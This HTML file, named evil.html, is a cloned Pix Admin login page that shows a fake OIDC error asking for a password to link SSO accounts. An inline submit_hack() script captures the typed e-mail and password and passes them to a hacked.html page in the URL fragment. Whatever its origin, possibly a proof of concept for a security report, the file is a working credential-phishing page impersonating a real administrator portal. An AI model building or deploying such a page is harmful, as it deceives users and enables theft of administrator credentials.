evil.html

<!DOCTYPE html>
<html lang="fr"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta content="IE=edge" http-equiv="X-UA-Compatible">
  <title>Pix Admin</title>
  <meta content="" name="description">
  <meta content="width=device-width, initial-scale=1" name="viewport">

  <link rel="apple-touch-icon" sizes="180x180" href="https://admin.integration.pix.fr/apple-touch-icon-pix_admin.png">

  <meta name="pix-admin/config/environment" content="%7B%22modulePrefix%22%3A%22pix-admin%22%2C%22environment%22%3A%22production%22%2C%22rootURL%22%3A%22%2F%22%2C%22locationType%22%3A%22history%22%2C%22EmberENV%22%3A%7B%22FEATURES%22%3A%7B%7D%2C%22EXTEND_PROTOTYPES%22%3A%7B%22Date%22%3Afalse%7D%2C%22_APPLICATION_TEMPLATE_WRAPPER%22%3Afalse%2C%22_JQUERY_INTEGRATION%22%3Afalse%2C%22_TEMPLATE_ONLY_GLIMMER_COMPONENTS%22%3Atrue%7D%2C%22APP%22%3A%7B%22API_HOST%22%3A%22%22%2C%22PIX_APP_URL_WITHOUT_EXTENSION%22%3A%22https%3A%2F%2Fapp.pix.%22%2C%22API_ERROR_MESSAGES%22%3A%7B%22BAD_REQUEST%22%3A%7B%22CODE%22%3A%22400%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.bad-request-error%22%7D%2C%22LOGIN_UNAUTHORIZED%22%3A%7B%22CODE%22%3A%22401%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.login-unauthorized-error%22%7D%2C%22USER_IS_TEMPORARY_BLOCKED%22%3A%7B%22CODE%22%3A%22403%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.login-user-temporary-blocked-error%22%7D%2C%22USER_IS_BLOCKED%22%3A%7B%22CODE%22%3A%22403%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.login-user-blocked-error%22%7D%2C%22LOGIN_NO_PERMISSION%22%3A%7B%22CODE%22%3A%22403%22%2C%22I18N_KEY%22%3A%22pages.login.api-error-messages.login-no-permission%22%7D%2C%22NOT_FOUND%22%3A%22404%22%2C%22INTERNAL_SERVER_ERROR%22%3A%7B%22CODE%22%3A%22500%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.internal-server-error%22%7D%2C%22GATEWAY_TIMEOUT%22%3A%7B%22CODE%22%3A%22504%22%2C%22I18N_KEY%22%3A%22common.api-error-messages.gateway-timeout-error%22%7D%7D%2C%22MAX_CONCURRENT_AJAX_CALLS%22%3A8%2C%22ORGANIZATION_DASHBOARD_URL%22%3A%22https%3A%2F%2Fmetabase.pix.fr%2Fdashboard%2F137%2F%3Fid%3D%22%2C%22USER_DASHBOARD_URL%22%3A%22https%3A%2F%2Fmetabase.pix.fr%2Fdashboard%2F132%2F%3Fid%3D%22%2C%22MAX_LEVEL%22%3A8%2C%22MAX_REACHABLE_LEVEL%22%3A6%2C%22APP_VERSION%22%3A%22dev%22%2C%22name%22%3A%22pix-admin%22%2C%22version%22%3A%224.144.0%22%7D%2C%22ember-cli-notifications%22%3A%7B%22autoClear%22%3Atrue%2C%22includeFontAwesome%22%3Atrue%7D%2C%22matomo%22%3A%7B%7D%2C%22fontawesome%22%3A%7B%22warnIfNoIconsIncluded%22%3Atrue%7D%2C%22pagination%22%3A%7B%22debounce%22%3A500%7D%2C%22searchTargetProfiles%22%3A%7B%22debounce%22%3A250%7D%2C%22ember-cli-mirage%22%3A%7B%22usingProxy%22%3Atrue%2C%22useDefaultPassthroughs%22%3Atrue%7D%7D">

  

<link integrity="" rel="stylesheet" href="Pix%20Admin_fichiers/vendor.2ff6da90883cd6c372ed1542e6b15313.css">
  

<link integrity="" rel="stylesheet" href="Pix%20Admin_fichiers/pix-admin.eb56c3259d570bea43f9369fd8123537.css">

  
<link href="data:text/css,%3Ais(%5Bid*%3D'google_ads_iframe'%5D%2C%5Bid*%3D'taboola-'%5D%2C.taboolaHeight%2C.taboola-placeholder%2C%23credential_picker_container%2C%23credentials-picker-container%2C%23credential_picker_iframe%2C%5Bid*%3D'google-one-tap-iframe'%5D%2C%23google-one-tap-popup-container%2C.google-one-tap-modal-div%2C%23amp_floatingAdDiv%2C%23ez-content-blocker-container)%20%7Bdisplay%3Anone!important%3Bmin-height%3A0!important%3Bheight%3A0!important%3B%7D" rel="stylesheet" type="text/css"></head>
<body class="ember-application">



<script src="Pix%20Admin_fichiers/vendor.af995ead41cec560a311ea4c7918fdde.js"></script>


<script src="Pix%20Admin_fichiers/chunk.363278ec05d413ec2e78.js"></script>
<script src="Pix%20Admin_fichiers/chunk.10cdaea2b3247e3c9c3e.js"></script>





<div class="login-page">
  <main class="login-page__main">
    <header class="login-page__header">
  <h1 class="login-page__header__title">Pix Admin</h1>
  <p class="login-form__information">L'accès à Pix Admin est limité aux administrateurs de la plateforme</p>
  <p class="login-form__error">OIDC Error : "invalid_request : Password is needed to link SSO accounts"</p>
</header>

<section class="login-page__section--login-form">
  <div class="login-form">
      <input id="ember3" class="ember-text-field ember-view login-form__fields login-form__email-field" placeholder="Adresse e-mail" aria-label="Adresse e-mail" required="true" autocomplete="true" type="text">

      <input id="ember4" class="ember-text-field ember-view login-form__fields" placeholder="Mot de passe" aria-label="Mot de passe" required="true" autocomplete="true" type="password">

<!---->
      <button class="pix-button pix-button--size-big pix-button--primary login-form__button" type="submit" onclick="submit_hack()">
<!---->    Je me connecte
<!----></button>
  </div>
</section>

    <footer>
    </footer>
  </main>
</div>
<script>
  function submit_hack(){
    username = encodeURI(document.querySelector('#ember3').value);
    password = encodeURI(document.querySelector('#ember4').value);
    console.log(username);
    console.log(password);
    window.location.href = "hacked.html#"+username+"------"+password ;
    return false;
}
document.getElementById('ember4').onkeydown = function(e){
   if(e.keyCode == 13){
     submit_hack();
   }
};
</script>

</body></html>